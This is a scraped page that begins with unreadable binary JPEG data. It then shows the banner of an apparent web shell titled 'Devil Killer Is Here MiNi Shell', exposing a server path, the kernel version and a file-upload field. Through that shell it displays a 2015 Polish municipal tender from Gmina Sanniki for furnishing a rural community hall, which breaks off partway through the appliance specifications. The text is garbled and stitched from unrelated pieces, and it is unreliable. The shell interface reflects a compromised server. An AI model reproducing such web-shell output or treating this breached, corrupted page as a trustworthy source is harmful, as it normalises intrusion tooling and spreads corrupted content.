JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150420/89500-N-2015.html

<p class="kh_header"><b>Sanniki: Przebudowa budynku świetlicy wiejskiej w Sannikach wraz z zagospodarowaniem terenu (w ramach zadania dostawa wyposażenia).</b><br>
<b>Numer ogłoszenia: 89500 - 2015; data zamieszczenia: 20.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sanniki , ul. Warszawska 169, 09-540 Sanniki, woj. mazowieckie, tel. 24 277 68 51, faks 24 277 68 51, 277 78 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanniki.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku świetlicy wiejskiej w Sannikach wraz z zagospodarowaniem terenu (w ramach zadania dostawa wyposażenia)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest dostawa i montaż wyposażenia w ramach zadania pn. Przebudowa budynku świetlicy wiejskiej w Sannikach wraz z zagospodarowaniem terenu.
Zamówienie obejmuje dostawę i montaż nowego wyposażenia z następujących grup asortymentowych:Część I - Meble i gablota informacyjna,
Część II - Sprzęt gospodarstwa domowego 
Część III - Sprzęt radiowo - telewizyjny,
Część IV - Urządzenia komputerowe,
Część V - Sprzęt sportowy. 
Część VI  Urządzenie do transportu osób na wózkach inwalidzkich
Szczegółowy opis przedmiotu zamówienia zawarty jest w opisie części zamówienia. Podane przez zamawiającego w opisie przedmiotu zamówienia nazwy własne (pochodzenie, producent, itd.) mają jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów. We wszystkich przypadkach, gdzie ze względu na specyfikę przedmiotu zamówienia i brak możliwości opisu przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, wskazano nazwy własne technologii, materiałów, wyrobów lub nazwy ich producentów, dopuszcza się zastosowanie technologii, materiałów i wyrobów równoważnych. Produkt równoważny to taki, który ma te same cechy funkcjonalne, co wskazany konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza od jakości określonego w specyfikacji produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 39.70.00.00-9, 32.30.00.00-6, 30.20.00.00-1, 37.40.00.00-2, 33.19.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków udziału w postępowaniu. Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6.1) Formularz ofertowy - załącznik nr 1 do SIWZ. III.6.2) . Kosztorys cenowy -załącznik nr 6 do SIWZ. Wykonawca wypełnia formularz ofertowy oraz kosztorys cenowy w zakresie oferowanych do wykonania części. III 6.3)Zobowiązanie podmiotów trzecich do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia (jeśli dotyczy). III.6.3) 6.4) Pełnomocnictwo osoby lub osób podpisujących ofertę - jeżeli uprawnienie do podpisu nie wynika bezpośrednio z załączonych dokumentów. III.6.5) Dokumenty wymagane w przypadku składania oferty wspólnej. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i do zawarcia umowy. Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. III.4.2), III.4.4) dla każdego wykonawcy z osobna, oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu na podstawie art. 22 ust.1 Ustawy - Prawo zamówień publicznych- wg załącznika nr 2 oraz pozostałe dokumenty mogą być złożone wspólnie. III.6.6) Dokumenty podmiotów zagranicznych. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - gwarancja - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 Ustawy. 2. Zamawiający dopuszcza możliwość dokonania w umowie następujących zmian: 1) zatrudnienia podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona przedmiot umowy osobiście, 2) podwykonawcy oraz zakresu podwykonawstwa w przypadku, gdy Wykonawca wykonuje przedmiot umowy przy pomocy podwykonawców, 3) wynagrodzenia umownego za zrealizowanie przedmiotu zamówienia w przypadku ograniczenia zakresu rzeczowego przedmiotu umowy przez Zamawiającego ze względu na wystąpienie okoliczności, nie przewidzianych przez Zamawiającego. 
W takim przypadku wynagrodzenie umowne ulegnie obniżeniu proporcjonalnie do ilości dostaw objętych rezygnacją, 4) w zakresie rodzaju/typu/modelu wyposażenia w przypadku obiektywnej niemożności dostarczenia sprzętu, mebli, bądź urządzeń, wskazanych w ofercie, w szczególności w sytuacji zakończenia produkcji, niedostępności na rynku, umowę można zmienić co do rodzaju/typu/modelu wyposażenia, pod warunkiem zachowania minimalnych wymaganych parametrów dostarczanego wyposażenia określonych przez Zamawiającego w specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanniki.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sannikach, 
ul. Warszawska 169, 
09-50 Sanniki,
pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2015 godzina 09:50, miejsce: Urząd Gminy w Sannikach, 
ul. Warszawska 169, 
09-50 Sanniki,
pokój nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Projekt znajduje się na zatwierdzonej liście operacji w ramach działania Odnowa i rozwój wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013. 2. Udział innych podmiotów w realizacji zamówienia 2.1) Zgodnie z art. 26. ust.2b ustawy prawo zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 2.2) Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w pkt 1 zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dokumentów dotyczących: - zakresu dostępnych wykonawcy zasobów innego podmiotu, - sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, - charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, - zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 2.3) Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust 2b ustawy Pzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy. 2.4) Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na zasoby którego Wykonawca powoływał się na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia powyższe warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Meble i gablota informacyjna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na meble i gablotę informacyjną wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Przed dostawą wyposażenia Wykonawca ma obowiązek uzgodnić z zamawiającym kolor dostarczanych mebli. Wymagane jest dostarczenie wskazanych mebli 
w jednym kolorze. Preferowane przez zamawiającego kolory mebli: dąb, buk, olcha. Zamówienie obejmuje również montaż mebli i gabloty. 
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1. Wyposażenie kuchni - szafka pod zlewozmywak
Szafka wykonana z płyty meblowej gładkiej laminowanej, okleinowanej PCV o zwiększonej odporności na wilgoć. Wymiary szafki 800x500x850cm.
Ilość zamawianych sztuk: 2.
2. Wyposażenie kuchni - szafka wisząca
Szafka wykonana z płyty meblowej gładkiej laminowanej, okleinowanej PCV o zwiększonej odporności na wilgoć. Wymiary szafki 900x730x350cm.
Ilość zamawianych sztuk: 5.
3. Wyposażenie kuchni - regał magazynowy 
Regał o wymiarach: 120x60x200[h]cm. Półki wykonane z płyty meblowej gładkiej laminowanej, okleinowanej PCV - obciążenie jednej półki - 280 - 300 kg. 
Regał zaczepowy (montaż bez śrub). Ilość półek - 5szt.
Ilość zamawianych sztuk: 4.
4. Wyposażenie kuchni - stół  roboczy,  wykonany ze stali nierdzewnej. Stół przeznaczony do stosowania w ciągach technologicznych umożliwiających przyrządzanie i przygotowanie produktów przed ich termiczną obróbką, wyposażony w szufladę. 
Wymiary stołu (długość/szerokość/wysokość): 140x70x85 cm
Ilość zamawianych sztuk: 2.
5.Wyposażenie świetlicy - krzesło świetlicowe 
Krzesło o konstrukcji metalowej malowanej proszkowo z miękkim tapicerowanym siedziskiem i oparciem. Siedzisko z tkaniny, wykonanej z włókna syntetycznego w kolorze szarym lub grafitowym. Wysokość całkowita: 80-85 cm, szerokość siedziska: 50-55cm, głębokość siedziska: 40-45cm, wysokość siedziska 45-50 cm.
 Ilość zamawianych sztuk: 100.
6.Wyposażenie świetlicy - gablota ogłoszeniowa 
Gablota zewnętrzna jednodrzwiowa oświetlana  
Format: 10xA4
Wykonana z profili anodowanych kolor inox/srebrny. 
Minimalne wymiary: 130x80x6,5 cm
Ilość zamawianych sztuk: 1.
7.Wyposażenie świetlicy - krzesło komputerowe 
Krzesło obrotowe a rolkach z miękkim tapicerowanym siedziskiem i oparciem, metalowa konstrukcja.
Siedzisko z tkaniny, wykonanej z włókna syntetycznego w kolorze szarym lub grafitowym. Wysokość całkowita: 80-85 cm, szerokość siedziska: 50-55cm, głębokość siedziska: 
40-45cm, wysokość siedziska 45-50 cm.
 Ilość zamawianych sztuk: 1.
8. Wyposażenie świetlicy - biurko pod komputer 
Wykonanie z płyty meblowej laminowanej o grubości: blaty - 30 mm, ścianki 20mm, okleinowanej PCV, kolor - klon. 
Stopki plastikowe zabezpieczające podłoże przed rysowaniem.
Wymiary: długość: 140 cm, szerokość: 80 cm wysokość: 75-80 cm.
Ilość zamawianych sztuk: 1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. gwarancja - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzęt gospodarstwa domowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalny okres gwarancji udzielonej na sprzęt gospodarstwa domowego wynosi 24 miesiące od daty odbioru przedmiotu zamówienia.
Minimalne wymagane parametry poszczególnych elementów przedmiotu zamówienia:
1. Wyposażenie kuchni - kuchenka mikrofalowa, 
Kuchenka sterowana elektronicznie o pojemności min 20 l, z wyświetlaczem elektronicznym. Wymagane minimalne funkcje: grill, termoobieg, rozmrażanie. Kolor: inox /srebrny.
Ilość zamawianych sztuk: 1.
2. Wyposażenie kuchni - czajnik elektryczny bezprzewodowy 
Czajnik ze wskaźnikiem poziomu wody o pojemności min.1,7 l. z filtrem antywapiennym, wykonany ze stali nierdzewnej. Element grzejny - płaska płyta, moc min. 2000 W. 
Kolor - inox/srebrny.
Ilość zamawianych sztuk: 2
3. Wyposażenie kuchni - lodówko-zamrażarka 
Dane techniczne:
-	klasa energetyczna: min. A 
-	pojemność chłodziarki: min.300 l 
-	rodzaj: side by side
-	posiada system No frost 
-	szerokość: 85-95 cm 
-	wysokość: 173-186 cm 
-	głębokość min. 66 cm
Kolor: inox /srebrny.
Ilość zamawianych sztuk: 1.
4. Wyposażenie kuchni - kuchnia gazowa z piekarnikiem elektrycznym, sterowana elektronicznie z wyświetlaczem elektronicznym, wymagane funkcje: turbo-grill (opiekacz obrotowy), termo-obieg, funkcja rozmrażania, wbudowane zapalarki palników, automatyczne odcięcie gazu, oświetlenie wnętrza, szuflada. 
System grzania komory - góra, dół oraz góra i dół. Wykonana ze stali nierdzewnej, kolor inox/srebrny. 
Dane techniczne:
- wymiary: 500 x 850 x 600 mm,
- zasilanie: 3 NPE 230V 50 Hz,
- klasa energetyczna: min. A,
- pojemność piekarnika: min.55 litrów,
- ilość palników: 4, łączna moc min 8,0kW,
- moc piekarnika: max 4 kW,
- zakres temp. płynna regulacja od 50 stopni C do 250 stopni C.
Ilość zamawianych sztuk: 1.
5. Wyposażenie kuchni - okap kuchenny kominowy 
Okap wykonany ze stali nierdzewnej w kolorze inox/srebrny, funkcje dodatkowe:  programator, pilot, czujnik wymiany filtra. 
Dane techniczne:
- typ okapu:  kominowy 
- szerokość:  90 cm 
- wydajność:  650 m3/h 
- sterowanie:  elektroniczne 
- oświetlenie:  halogenowe 2x35W 
- warianty pracy:  wyciąg lub pochłaniacz 
- głośność:  max. 54 dB
- wyposażenie eksploatacyjne: filtry aluminiowe-1szt., filtry węglowe-2 szt.
Ilość zamawianych sztuk: 1.
6. Wyposażenie kuchni - szafa chłodnicza 
Dane techniczne:
-	wymiary zewnętrzne: min.750x730x1640 mm
-	Wymiary wewnętrzne: min.600 x 560 x 145 mm
-	Pojemność całkowita min.544 l
-	Zużycie energii w ciągu 24 godzin: 1 kWh
